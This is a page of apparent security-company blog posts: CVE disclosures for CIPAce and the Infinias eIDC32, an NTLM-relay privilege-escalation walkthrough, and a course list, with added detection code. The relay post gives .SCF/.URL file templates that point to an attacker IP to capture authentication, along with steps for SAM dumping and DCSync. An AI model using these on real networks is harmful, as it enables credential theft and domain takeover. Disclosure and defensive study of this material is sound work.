Vulnerabilities Discovered in CIPAce Enterprise Platform


Versions Tested:
CIPAce Version < 6.80 Build 2016031401
CIPAce Version < 9.1 Build 2019092801

Product:
https://www.cipplanner.com/Products/CIPAce/Pages/CPMPlatform.aspx

Security Advisories:
N/A

CVE Numbers:

  • CVE-2020-11586
  • CVE-2020-11587
  • CVE-2020-11588
  • CVE-2020-11589
  • CVE-2020-11590
  • CVE-2020-11591
  • CVE-2020-11592
  • CVE-2020-11593
  • CVE-2020-11594
  • CVE-2020-11595
  • CVE-2020-11596
  • CVE-2020-11597
  • CVE-2020-11598
  • CVE-2020-11599

CyberOne's TEAMARES researchers have released a steady cadence of advice on the importance of testing your systems regularly for vulnerabilities. The vulnerabilities below, uncovered during an external penetration test, drive home that necessity.

While conducting an external penetration test, our team noticed something strange: a web application called CIPAce was disclosing detailed errors. Under normal circumstances this would not be unusual, but the way the application handled errors, coupled with the fact that full stack traces were returned to the client, meant that the web.config file was configured incorrectly (in ASP.NET, customErrors mode="Off" sends detailed error pages to remote clients).
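The misconfiguration described above can be checked for mechanically. The following is an added example, not code from the original write-up or from CIPAce: it parses an ASP.NET web.config and reports the three system.web settings that put stack traces or trace output in front of remote clients. Both sample files are constructed for the example, and missing elements are treated as their ASP.NET defaults (customErrors RemoteOnly, debug off, trace off).

```python
from __future__ import annotations

import xml.etree.ElementTree as ET

# Constructed web.config that reproduces the symptom above: detailed errors for every client.
# Not taken from CIPAce; the attribute values are the ones that cause the behaviour described.
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="true" targetFramework="4.5" />
    <customErrors mode="Off" />
    <trace enabled="true" localOnly="false" />
  </system.web>
</configuration>
"""

# The same file with the settings a production deployment should carry.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="false" targetFramework="4.5" />
    <customErrors mode="RemoteOnly" defaultRedirect="~/Error.aspx" />
    <trace enabled="false" />
  </system.web>
</configuration>
"""


def _attr(element, name: str, default: str) -> str:
    """Attribute value lowercased, falling back to the ASP.NET default when the element or
    attribute is absent."""
    if element is None:
        return default.lower()
    return element.get(name, default).lower()


def audit_web_config(xml_text: str) -> list[str]:
    """Return information-disclosure findings for an ASP.NET web.config.

    Defaults applied for missing elements: customErrors mode=RemoteOnly,
    compilation debug=false, trace enabled=false and localOnly=true.
    """
    findings: list[str] = []
    root = ET.fromstring(xml_text)
    # The tag contains a dot, so look it up among the direct children rather than via a path
    system_web = next((child for child in root if child.tag == "system.web"), None)
    if system_web is None:
        return findings

    if _attr(system_web.find("customErrors"), "mode", "RemoteOnly") == "off":
        findings.append("customErrors mode=Off: full stack traces are returned to remote clients")

    if _attr(system_web.find("compilation"), "debug", "false") == "true":
        findings.append("compilation debug=true: debug build running in production")

    trace = system_web.find("trace")
    if _attr(trace, "enabled", "false") == "true" and _attr(trace, "localOnly", "true") == "false":
        findings.append("trace enabled with localOnly=false: trace.axd is reachable remotely")

    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(label, audit_web_config(cfg) or ["no findings"])
```

Run it against the web.config of each application (and any location-level overrides, which this example does not walk) before exposing the application externally; the weak sample yields three findings, the hardened one none.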

Typically, a red teamer would blindly attack this application if it could not be downloaded from an open-source repository or as a trial version. However, we decided to ask our client directly for the entire application source code as it was unavailable for download anywhere. Although these types of requests are ordinarily refused, our client was more than happy to share the source code with the team.

With the source code in hand and JetBrains' dotPeek .NET decompiler downloaded, we promptly delved into the application, only to find a whopping 15 zero-days. This is a great example of why providing your source code to red teamers helps us flush out bugs and investigate the vulnerabilities that pose the greatest risk.

Technical Details:
Upon receiving the code for version 6.80 Build 2016031401 of the CIPAce application, we were not aware that a newer version existed. While going through the source code and APIs, we noticed an API named GetDistributedPOP3 that returned the username and password of the SMTP user.


Figure 1: API Request obtaining SMTP Password

We quickly emailed the client to inform them of this bizarre “feature” and heard that there was a newer version available for review. This vulnerability did not exist in version 9.1 of the CIPAce application; however, we discovered this was just the tip of the iceberg.

The client provided us the source code for version 9.1 Build 2019092801. Since the first "feature" that leaked sensitive data was an API, we dug further and found a large number of other SOAP calls that leaked internal data, including hostnames, folder and file paths, and database structures. The one that stood out most was a SOAP call that returned the entire contents of the user table in the database, making SQL injection unnecessary: we had everything we needed to log in to the application with the highest privileges. On a positive note, the passwords were MD5 hashed, although MD5 offers little resistance to offline cracking.


Figure 2: API Request Leaking Username and Password Data

Lastly, the most impactful vulnerability we discovered during the penetration test was a handler called "Upload.ashx". After a quick review, our team observed that it had no authentication check at all and allowed any ASHX file to be written to the underlying file system. With that in mind, we quickly drafted a multipart/form-data POST request to upload a web shell. By this time the client had locked the application down to be reachable only from our IP, so we were not concerned about leaving an unauthenticated web shell exposed.


Figure 3: Uploading ASHX web shell


Figure 4: Executing commands through uploaded web shell
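A detection pass a defender can run over IIS access logs for the pattern above (an unauthenticated POST to an .ashx handler, followed by requests to a handler that did not exist before), as an added example that is not part of the original write-up: the log excerpt is constructed, the path /CIPAce/Uploads/cmd.ashx is a hypothetical web-shell location, and the baseline set of known handlers is an assumption that a real deployment would fill in from its own install.

```python
from __future__ import annotations

# Constructed W3C-format IIS log excerpt (not from the engagement). The field order comes from
# the "#Fields:" directive exactly as IIS writes it, so the parser does not hard-code columns.
# /CIPAce/Uploads/cmd.ashx is a hypothetical web-shell location, not a path from the write-up.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2019-11-17 14:02:11
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-11-17 14:02:11 10.0.0.5 GET /CIPAce/Login.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 120
2019-11-17 14:02:19 10.0.0.5 POST /CIPAce/Upload.ashx - 443 - 203.0.113.7 python-requests/2.22 - 200 0 0 88
2019-11-17 14:02:25 10.0.0.5 GET /CIPAce/Uploads/cmd.ashx cmd=whoami 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 35
2019-11-17 14:03:01 10.0.0.5 POST /CIPAce/Upload.ashx - 443 CORP\\jdoe 10.0.0.42 Mozilla/5.0 https://cip.example/CIPAce/Docs.aspx 200 0 0 64
"""

# Handlers that legitimately exist in the deployment (assumption: build this from the install).
KNOWN_HANDLERS = {"/cipace/upload.ashx"}


def parse_iis_w3c(text: str) -> list[dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields directive."""
    fields: list[str] = []
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):   # IIS URL-encodes spaces inside fields
            rows.append(dict(zip(fields, values)))
    return rows


def find_handler_abuse(rows, known_handlers=KNOWN_HANDLERS) -> list[tuple[str, str, str]]:
    """Flag (reason, client IP, path) for suspicious .ashx activity.

    Two signals: a successful POST to a handler with no IIS-authenticated user, and any
    successful request to a handler that is not in the deployment baseline (a freshly
    uploaded file). cs-username is "-" for anonymous IIS authentication; applications that
    use ASP.NET forms authentication also log "-", so for them only the baseline check counts.
    """
    findings = []
    for row in rows:
        stem = row["cs-uri-stem"]
        if not stem.lower().endswith(".ashx"):
            continue
        if not row["sc-status"].startswith("2"):
            continue
        if row["cs-method"] == "POST" and row["cs-username"] == "-":
            findings.append(("anonymous POST to handler", row["c-ip"], stem))
        if stem.lower() not in known_handlers:
            findings.append(("request to handler outside baseline", row["c-ip"], stem))
    return findings


if __name__ == "__main__":
    for finding in find_handler_abuse(parse_iis_w3c(SAMPLE_IIS_LOG)):
        print(*finding)
```

On the constructed excerpt the anonymous POST to Upload.ashx and the later hit on the unknown cmd.ashx are flagged, while the authenticated upload from the internal address is not. The baseline check is the one to rely on when the application does its own authentication, because IIS then has no username to log.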

Additional Vulnerabilities:
These are just a few of the many vulnerabilities found; the following table outlines some additional ones. It is important to note that all of these issues are exploitable without authentication, which underscores the necessity of thoroughly reviewing applications to prevent bugs, especially applications marketed to government agencies and major corporations.

[Table of additional vulnerabilities: image not reproduced]

Timeline:
11/13/2019 – Discovered POP3 Password Disclosure Issue
11/14/2019 – Confirmed the POP3 Password Disclosure was fixed on version 9.1
11/17/2019 – Discovered 14 other 0-days in application version 9.1
11/17/2019 – First communication sent to vendor / No Response
11/19/2019 – Second communication sent to vendor / No Response
11/25/2019 – Third communication sent to the vendor
11/26/2019 – Vendor responded via phone call and stated they are working with the client to get it fixed
01/23/2020 – Confirmed all but one information disclosure issue was fixed
03/19/2020 – Confirmed that the last information disclosure item was fixed
03/24/2020 – Requested CVEs

Credit:
Discovered by Quentin (paragonsec) Rhoads-Herrera, Director of Professional Services at CyberOne

Our Team:
CyberOne’s TEAMARES is comprised of professionals with more than a decade of experience conducting offensive and defensive security services. Our team has expertise in a wide array of industries, including oil and gas, healthcare, app development firms, hospitality, technology, and more.

Follow us on Twitter @TeamAresSec to stay up to date on vulnerability discoveries and cybersecurity news.

From the Trenches: Relaying Passwords for the Win!

As pentesters and red teamers, we know that it isn't hard to get user passwords. The real challenge can be getting an elevated user such as Domain Admin (DA) or Enterprise Admin (EA), especially if you want to bypass security auditing such as alerts on the addition of a user to a privileged domain group. This is a common theme in the pentests TEAMARES conducts, so I decided to show how a low-level user can be used either to obtain local account hashes from the Security Account Manager (SAM) database, or to gain the extended right Replication-Get-Changes-All by modifying the domain object's Access Control List (ACL), so that the low-level user can run a DCSync attack and retrieve every credential hash and secret stored in the domain.

In order for this to work you will need:

  • A low-level user password within the domain
  • A network share that is writable by that low-level user and one that elevated users navigate to
  • Responder, Impacket, and CrackMapExec from a tools perspective

Regardless of how you get the password of a low-level user, make sure that it is not an administrator on any machines already. If it is, it’s possible that the client is reusing a local admin password for all devices and you don’t need any help escalating. This blog assumes you did that and found that your user has low privileges.

Figure 1: Using CrackMapExec to show that the user is a real domain user

With our low-level user validated as a domain user, the next step is to find which shares user rick can read and write. To do this I use smbmap, which is great because it can take one host or many from a file, although you could use CrackMapExec with the --shares option to do the same thing. Running it as rick, we find that the machine 10.20.80.71 has an SMB share named home that is readable and writable.

Our assumption is that the home directory is accessible by all Windows machines within the network. This is something we have seen often, especially when it comes to mapping file shares for user home directories.

Figure 2: Showing read and write access to user rick

I have also found that some companies map Windows shares to Linux systems through NAS devices, so make sure to check those areas as well. The key is to find a share that is mapped to Windows devices that can be viewed by administrators either on the domain or local.

The next step is to map the SMB share home from 10.20.80.71 to the attackers’ box. To do this on Linux I use cifs-utils to issue the following commands:

# Install cifs-utils
apt install cifs-utils

# Set up a mount point
mkdir /mnt/victim

# Mount the victim SMB share to /mnt/victim
mount -t cifs -o username=<windows user> //<Victim_IP>/<share> /mnt/victim

Figure 3: Mounting share to attackers’ box

With the share mounted, we can see that it is possible to write to the svc-superadmin user's directory, which, based on the naming convention, we can assume is a good target. Now we need to set up our attack. We want to use NTLM relaying to "automate" the attack and either receive SAM hashes from the target machine or give the user rick the extended right Replication-Get-Changes-All. To do that, we can choose one of two file formats that, when a user merely browses the folder containing them, make Windows Explorer authenticate to the attacker's machine; that NET-NTLMv2 authentication is what we relay to the target box 10.20.80.71.

REMEMBER YOU CAN'T RELAY TO THE SAME BOX! (Windows has rejected authentication reflected back to the originating host since MS08-068, so the victim that browses the share and the relay target must be different machines.)

Two file formats that can be used are .SCF or .URL files as shown below:

# SCF File Format
[Shell]
Command=2
IconFile=\\<attackerIP>\test
[Taskbar]
Command=ToggleDesktop

# URL File Format
[InternetShortcut]
URL=work
WorkingDirectory=work
IconFile=\\<attackerIP>\safe.icon
IconIndex=1

Sometimes an .SCF file won’t work but a .URL will. Not sure why this is and if you know why, please feel free to let me know.

With a file format chosen, we craft the file replacing the attacker IP and put it within the user’s svc-superadmin home directory.

Figure 4: .URL file in victim directory

For the first attack, we are going to dump the SAM hashes. This alone is sometimes enough to gain DA or EA, because some companies reuse the same local administrator password across their entire environment. We can also use that local admin hash to dump LSA Secrets, a protected registry location holding sensitive data used by the Local Security Authority, from every box; we have often found cleartext credentials in that dump using CrackMapExec.

To do this, we first start Impacket's ntlmrelayx.py with a target file listing the hosts we want to relay the captured authentication to. In our example we use only one IP, as we will be viewing the .URL file from a different Windows Server.

Figure 5: Impacket running with host file containing 10.20.80.71

After Impacket is running, turn on Responder so that we can capture the NET-NTLMv2 hash of the victim user svc-superadmin that will be passed on to Impacket.

Figure 6: Responder Running waiting on incoming connections

Once the user svc-superadmin browses the shared folder from their machine, Responder captures the incoming NET-NTLMv2 authentication and it is passed on to Impacket, which authenticates to the target machine we configured earlier and dumps the SAM hashes from that server.

Figure 7: SAM Being dumped when svc-superadmin browses fileshare

We could stop here, but maybe we don't want just the local hashes; we want to change the low-level user rick's ACL so that he can perform the DCSync attack. What if the client is using something like Microsoft's Local Administrator Password Solution (LAPS), which randomizes the local administrator password on each domain-joined machine and stores it in Active Directory where only authorized principals can read it?

We can do that with Impacket as well, by relaying the authentication to the LDAP service on a domain controller instead of to SMB. This only works if the relayed account is an elevated domain user with the right to modify the domain object's ACL, and if the domain controller does not enforce LDAP signing and channel binding, which would reject the relayed session.

Figure 8: Changed ACLs for user rick

Once svc-superadmin views the share, you will notice that Impacket enumerates svc-superadmin's rights in the domain and then adds an ACE on the domain object granting rick the extended right Replication-Get-Changes-All (together with the base Replication-Get-Changes right, which DCSync also needs), which allows him to replicate secret domain data and retrieve credential hashes with DCSync. Since most companies monitor additions to privileged groups rather than ACL changes, this can bypass rules in Splunk and other monitoring tools with ease, letting you reach your goal: the contents of NTDS.dit, which holds the password hashes for every user, service account, and machine in the domain.

Figure 9: Dumping NTDS.DIT by user rick

After dumping the domain, we need to restore the ACL to what it was before, to ensure proper clean-up. To do this, take the NTLM hash for svc-superadmin acquired in the NTDS.dit dump and use the aclpwn.py tool (from Fox-IT, built on Impacket) with its --restore option to reverse your changes.

Figure 10: Restoring user rick’s ACL’s

How to protect yourself against this attack?

One way to prevent this attack is to lock down share access as much as possible to ensure low-level users don’t have arbitrary write access to locations that are also viewed by privileged users. This shows why having shares such as “temp” to temporarily share folders among any user within a network can be very dangerous.

Another way to prevent this attack is to not use privileged accounts for normal day-to-day operations. Having separate accounts for privileged access is imperative! If a user who also holds a DA account with a different password has their normal account's NET-NTLMv2 authentication captured or relayed, the attacker would not be able to elevate privileges so easily.

Next, you could monitor your domain for any changes to ACLs that grant the following extended rights, which are the ones DCSync relies on:

  • Replicating Directory Changes
    CN: DS-Replication-Get-Changes
    GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
  • Replicating Directory Changes All
    CN: DS-Replication-Get-Changes-All
    GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
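The monitoring suggested above, as an added example that is not part of the original post: Windows Security event 5136 (a directory service object was modified) carries the new nTSecurityDescriptor in SDDL form when the domain object's ACL changes, and this code parses that SDDL and reports any trustee outside an expected baseline that is granted either replication right (or GenericAll, which includes them). The event record and the SDDL strings are constructed for the example, and the baseline of expected trustees is an assumption to be adjusted per domain.

```python
from __future__ import annotations

import re

# Extended-rights GUIDs used for DCSync (from the list above).
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Trustees that legitimately hold replication rights on the domain head: SDDL aliases and
# well-known SIDs. Assumption for the example; add your own replication service accounts.
EXPECTED_TRUSTEES = {"BA", "DA", "EA", "ED", "SY", "S-1-5-32-544", "S-1-5-9", "S-1-5-18"}

DS_CONTROL_ACCESS = 0x100        # "CR" in symbolic SDDL
GENERIC_ALL = 0x10000000         # "GA" in symbolic SDDL

_DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")   # DACL flags, then the ACE list
_ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed SDDL: a plausible baseline DACL for DC=corp,DC=local, then the same DACL after
# the relay attack appended two ACEs for an ordinary user's SID.
BASELINE_DACL = (
    "O:DAG:DAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
)
ESCALATED_DACL = BASELINE_DACL + (
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
)

# Constructed event 5136 as a flat dict of the fields a SIEM would extract from the XML.
SAMPLE_EVENT = {
    "EventID": 5136,
    "ObjectDN": "DC=corp,DC=local",
    "ObjectClass": "domainDNS",
    "AttributeLDAPDisplayName": "nTSecurityDescriptor",
    "OperationType": "%%14674",   # value added
    "AttributeValue": ESCALATED_DACL,
}


def _rights_flags(rights: str) -> tuple[bool, bool]:
    """Return (grants_control_access, grants_generic_all) for an SDDL rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return bool(mask & DS_CONTROL_ACCESS), bool(mask & GENERIC_ALL)
    # Symbolic rights are fixed two-letter tokens; split in pairs so "DCRP" is not read as "CR".
    tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return "CR" in tokens, "GA" in tokens


def dcsync_grants(sddl: str, expected=EXPECTED_TRUSTEES) -> list[tuple[str, str]]:
    """List (trustee, right) pairs in the DACL that give an unexpected principal DCSync ability."""
    match = _DACL_RE.search(sddl)
    if not match:
        return []
    findings: list[tuple[str, str]] = []
    for body in _ACE_RE.findall(match.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        if ace_type not in ("A", "OA") or trustee in expected:   # allow ACEs, unexpected trustee
            continue
        has_cr, has_ga = _rights_flags(rights)
        if ace_type == "OA" and has_cr and obj_guid.lower() in DCSYNC_RIGHTS:
            findings.append((trustee, DCSYNC_RIGHTS[obj_guid.lower()]))
        elif has_ga and obj_guid == "":
            findings.append((trustee, "GenericAll (includes both replication rights)"))
    return findings


def dcsync_grants_from_event(event: dict) -> list[tuple[str, str]]:
    """Apply the check to one Security event 5136 on the domain object itself."""
    if event.get("EventID") != 5136:
        return []
    if event.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
        return []
    if event.get("ObjectClass") != "domainDNS":
        return []
    return dcsync_grants(event.get("AttributeValue", ""))


if __name__ == "__main__":
    for trustee, right in dcsync_grants_from_event(SAMPLE_EVENT):
        print(f"ALERT {SAMPLE_EVENT['ObjectDN']}: {trustee} granted {right}")
```

Auditing of directory service changes must be enabled, and a SACL on the domain object must cover Write DACL, for event 5136 to be produced at all; the rule then fires on the ACL write itself, which is the step the relay attack cannot avoid even though it never touches a privileged group.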

Finally, you can require SMB signing so that relayed sessions are rejected on the server side. In the Group Policy Editor, go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set both of the following to "Enabled":

  • Microsoft network server: Digitally sign communications (always)
  • Microsoft network server: Digitally sign communications (if client agrees)

Note that SMB signing only stops the relay to SMB used in the first attack; the LDAP variant is stopped by enforcing LDAP signing and LDAP channel binding on your domain controllers.

Author: Quentin (paragonsec) Rhoads-Herrera, Director of Professional Services

March 26, 2020

Telesploit: Open-Source Remote Vulnerability Assessment & Penetration Testing

Due to current events, your organization is more than likely experiencing disruption resulting from a rush to implement remote work policies, social distancing, and other unexpected changes to business as usual.

And if you’re like many organizations, chances are you did not have remote work contingency plans in place and may be scrambling to find the right tools to ensure your security programs continue uninterrupted.

Whether you’re a VAR or managing an internal team, your red team can still function remotely with offensive security testing tools that leverage open-source technology. Remote and open-source teams can help keep security in place with no gaps.

TEAMARES' Director of Professional Services, Quentin Rhoads-Herrera, and partner Telesploit's chief consultant, Wirefall, encourage you to explore the open-source version of Telesploit on GitHub.

Telesploit was designed by and for penetration testers. It creates a simple solution for performing internal penetration tests remotely. In this blog, Quentin and Wirefall share the key benefits of deploying a remote internal penetration testing solution, which includes:

  • Reduced travel costs. Travel can be a significant factor in the overall cost of doing business for internal security testing. If you’re seeking to reduce expenses associated with 3rd party assessments, organizations that don’t have a remote offering will find themselves at a disadvantage.
  • Increased utilization. While reducing travel time can have a positive effect on overall utilization, being able to leverage a single resource across multiple concurrent engagements significantly enhances utilization.
  • Maximized onsite productivity. All initial reconnaissance can be completed prior to arrival. If a new vulnerability or unfamiliar target is identified during the discovery phase then attacks can be staged and tuned in a lab environment well in advance of deployment within the client environment. The penetration tester will be ready for exploitation on Day 1.
  • Become more flexible. Leverage your resources wherever they’re located, whether it’s Boise, Boston, or Bengaluru.
  • Provide new services. Open source can allow for novel approaches to penetration testing that weren’t economically feasible before, such as “low and slow” attacker simulation, blue team training, and more convenient retesting.
  • Decreased employee burnout. Eliminate unnecessary travel to help keep your talent from moving on.
  • Increased employee health and safety. A sound work from home policy, even under normal circumstances, can keep employees productive without exposing them to colleagues who may be sick.

Follow us at @TeamAresSec to stay up to date.

If you need help implementing remote penetration testing tools, talk to a TEAMARES team member or reach out to Telesploit at info@telesploit.com today for assistance. We want to keep you working!

Authentication Bypass Vulnerability Discovered in Infinias eIDC32 WebServer

Versions Tested:
Web Revision: 1.107, Board: 3.001, Firmware: 2.213

Product:
https://www.3xlogic.com/products/access-control/infinias-ethernet-enabled-integrated-door-controller-eidc

Security Advisories:
N/A

CVE Numbers:
CVE-2020-11542

CVSS Score:
N/A

CWE:
CWE-305: Authentication Bypass by Primary Weakness

NIST:
IA-4: Identifier Management

OWASP:
A2: Broken Authentication

With access to a system’s control interface, a malicious actor can unlock controls remotely, allowing them to gain physical entry to restricted areas. However, lessons learned from other breaches can help everyone better understand how to prevent unwanted access.

During an internal penetration test, our team discovered a physical access control system from Infinias on the target network. As luck would have it, the device was still configured with default credentials, which allowed us to log in and look around. After briefly browsing the manufacturer’s site and reading their documentation, it became clear that this could be an interesting target as the Infinias eIDC is a PoE-enabled door controller that allows one or more physical access control systems to be integrated into a network for ease of management. It was interesting to find a device configured to still accept default credentials. However, we did notice something else that was strange. When reviewing HTTP logs in Burp Suite, the string “CMD” was found in a number of requests. That sounded juicy, so we did what red teamers do and started chasing the white rabbit down a hole.

We discovered that the Infinias eIDC32 WebServer has an exploitable authentication bypass vulnerability because the authentication decision is made in client-side JavaScript. This would have been harder to identify without a set of valid credentials, default or not. However, with physical access to IoT devices like these, the firmware can be pulled off and analyzed for an even deeper dive.

Technical Details:

Greeted with the device’s web interface we were able to log in using default credentials found within their documentation.

Figure 1 – Web UI Login

While watching the traffic in Burp Suite, this little gem stood out immediately.

Figure 2 – HTTP Request With String “CMD”

When intercepted, this is the HTTP Response to the request with valid credentials:

Figure 3 – Intercepted HTTP Response from a Valid Login

At this point, we decided to take a look at the source code to see how the authentication was being handled. A quick search for the string “LGI” returned the following bit of vulnerable code:

Figure 4 – Vulnerable Client-side Authentication JavaScript

This section simply hex encodes the username and the password and places a "00" between the two encoded values; the credentials are obfuscated, not protected. The next step was to compare the responses to valid and invalid credentials, so we submitted another authentication request with invalid credentials (UN: AAAA, PW: AAAA).

Figure 5 – Intercepted HTTP Response Demonstrating Encoding Methods

Comparing the HTTP responses of invalid and valid credentials, the difference becomes clear. The HTTP response to the successful login contains the string “<KEY>MYKEY</KEY>” in the XML body data, whereas the failed login does not.

Using Burp Suite, we intercepted the eIDC32 WebServer’s response to our login attempt using invalid credentials. From there, we added the string “<KEY>MYKEY</KEY>” to the XML body data to match the successful login response and forwarded the response.

Figure 6 – Editing Invalid Login Response to Add the Value “MYKEY”

Changing this value in the HTTP response bypasses the client-side JavaScript controls, allowing an attacker with invalid credentials to bypass the device's login process and access it as an administrative user. Because the grant-or-deny decision is made by JavaScript in the browser, anyone who can alter the response on its way to the browser can substitute the server's verdict.

Figure 7 – The Infinias System’s Control Panel
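The encoding and the client-side decision described above, as an added example that is not part of the original write-up or of the vendor's firmware: encode_login reproduces the hex(username) + "00" + hex(password) blob and decode_login recovers credentials from a captured one; client_side_login_succeeded and tamper_response reproduce the flawed trust in the <KEY> element and the Figure 6 edit. The XML layouts, the credential store and the server_login/authorize functions are constructed assumptions that show how a server-issued session token, checked on every request, defeats the tampered response.

```python
from __future__ import annotations

import secrets
import xml.etree.ElementTree as ET

# Constructed login responses. The real eIDC32 XML layout is not shown on the page; only that
# a successful login carries <KEY>MYKEY</KEY> and a failed one does not.
CONSTRUCTED_SUCCESS = "<RESPONSE><STATUS>OK</STATUS><KEY>MYKEY</KEY></RESPONSE>"
CONSTRUCTED_FAILURE = "<RESPONSE><STATUS>FAIL</STATUS></RESPONSE>"


def encode_login(username: str, password: str) -> str:
    """Build the credential blob the page describes: hex(username) + "00" + hex(password)."""
    return (username.encode() + b"\x00" + password.encode()).hex()


def decode_login(blob: str) -> tuple[str, str]:
    """Recover cleartext credentials from a captured blob: hex is encoding, not protection."""
    user, _, pw = bytes.fromhex(blob).partition(b"\x00")
    return user.decode(), pw.decode()


def client_side_login_succeeded(response_xml: str) -> bool:
    """The flawed decision the device's JavaScript makes: trust whatever the response body says."""
    return ET.fromstring(response_xml).find(".//KEY") is not None


def tamper_response(failed_xml: str) -> str:
    """What the interception proxy does in Figure 6: add the KEY element to a failed login."""
    root = ET.fromstring(failed_xml)
    ET.SubElement(root, "KEY").text = "MYKEY"
    return ET.tostring(root, encoding="unicode")


# Hardened alternative (added design, not the vendor's): the server decides, and every later
# request must present an unguessable token that only the server can have issued.
_VALID_CREDENTIALS = {"admin": "admin"}   # constructed store; real code keeps salted hashes
_SESSIONS: set[str] = set()


def server_login(username: str, password: str) -> str | None:
    """Return a fresh session token for valid credentials, None otherwise."""
    stored = _VALID_CREDENTIALS.get(username)
    if stored is None or not secrets.compare_digest(stored, password):
        return None
    token = secrets.token_hex(32)
    _SESSIONS.add(token)
    return token


def authorize(token: str) -> bool:
    """Every privileged handler calls this; a client-injected constant such as MYKEY fails here."""
    return token in _SESSIONS


if __name__ == "__main__":
    blob = encode_login("admin", "admin")
    print("login blob:", blob, "->", decode_login(blob))
    print("client accepts tampered failure:",
          client_side_login_succeeded(tamper_response(CONSTRUCTED_FAILURE)))
    print("server accepts injected key:", authorize("MYKEY"))
```

The first half shows why the CMD LGI request is worth watching in proxy or network logs (the credentials are trivially recoverable) and why the Figure 6 edit works; the second half shows the property a fix needs: the browser never gets to decide, and the secret it must present is random per login rather than the constant MYKEY.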

Lessons learned
While central management of networked access control systems can be a huge convenience, it is important to ensure that the systems are configured properly, kept updated, and to disable/change any default accounts to prevent malicious activity.

Timeline:
3/20/2019 – First communication sent to the vendor
3/22/2019 – Technical Support replies saying it will be sent to the “access team” for review
3/25/2019 – Response from a second technical support employee:

“What vulnerability are you speaking of? We do get flagged on occasion for different things. To my knowledge, most or all have a workaround”

3/25/2019 – Back and forth discussing finding, submitted PDF with additional details, no response.
4/8/2019 – Still no response, I reached back out to no avail.
9/30/2019 – The client met with a rep from Stanley Security, 3XLogic’s parent company, and connected us. All info including the write-up and previous emails were sent to Stanley Security.
2/27/2020 – No response still
3/12/2020 – Submitted for CVE

Credit:
Discovered by the following Security Researchers for TEAMARES at CyberOne
Quentin Rhoads-Herrera, Director of Professional Services – @paragonsec
Cory Mathews, Offensive Security Manager – @M3chSec
Chase Dardaman, Senior Adversarial Engineer – @CharlesDardaman

New course offered at BlackHat 2020:

To help sharpen the skills of penetration testers and threat hunting teams, TEAMARES will be offering an onsite training course at BlackHat USA 2020 in “Adversary Emulation and Active Defense.”  This course will provide information security concepts utilized in both offense and defense. Attendees will learn skills that can be applied to increase capability from both sides including exploitation, circumventing defenses and lateral movement from an attacker’s perspective. The course will also cover key techniques for detection, threat hunting and mitigation to counter an attacker’s toolbox.

Follow us on Twitter @TeamAresSec to stay up to date on vulnerability discoveries and cybersecurity news.

The Best Online Security Courses to Take in Your Downtime

With the daily routines of millions rapidly changing as we settle into a period of social distancing, many are looking for ways to pass the time once their reading lists have been plowed through and the Netflix binge no longer does the trick. Why not take advantage of this downtime to learn a new skill or brush up on your knowledge with a few refresher courses?

CyberOne's TEAMARES has compiled a list of the best online security training courses currently on the market, both free and paid. Here are some to consider:


Paid Courses:

Offensive Security:

  • OSCP provides solid entry-level certification that will teach you how to think like an attacker. This is the one you need to land a job in penetration testing if you have no experience.
  • OSCE is a good entry point to learning stack-based exploit development.

ElearningSecurity:


Hack the Box – Offshore & Rasta Labs

  • Inexpensive lab environments, NOT courses, with hands-on practicals that cover everything from open-source intelligence gathering to exploit development. Commonly touted as a great practice area for certification courses such as the OSCP.


Nathan House Security Courses:


Free Courses:
  • Azeria Labs to learn ARM32 bit exploit development.
  • Ruben Boonen with a lot of great tutorials around Windows security and penetration testing.
  • Corelan Team offers a series on learning exploit development.
  • Malware Unicorn is a great resource on malware reverse engineering and includes a VM.
  • Hack the Box has free resources along with paid that can be used to get hands-on practice.
  • VulnHub contains a resource of vulnerable by-design boxes that users can practice on.
  • EdX offers a series of courses ranging from intro to python programming to Linux and beyond.
  • Coursera contains over 1,000 free courses that can be used to further your IT experience.
  • Cybrary contains tons of free IT classes and videos.
  • Learn Digital with Google offers many free courses.
  • Portswigger contains many free labs to practice web application penetration testing.

Phishing Attacks: Beware of Online Financial Scams

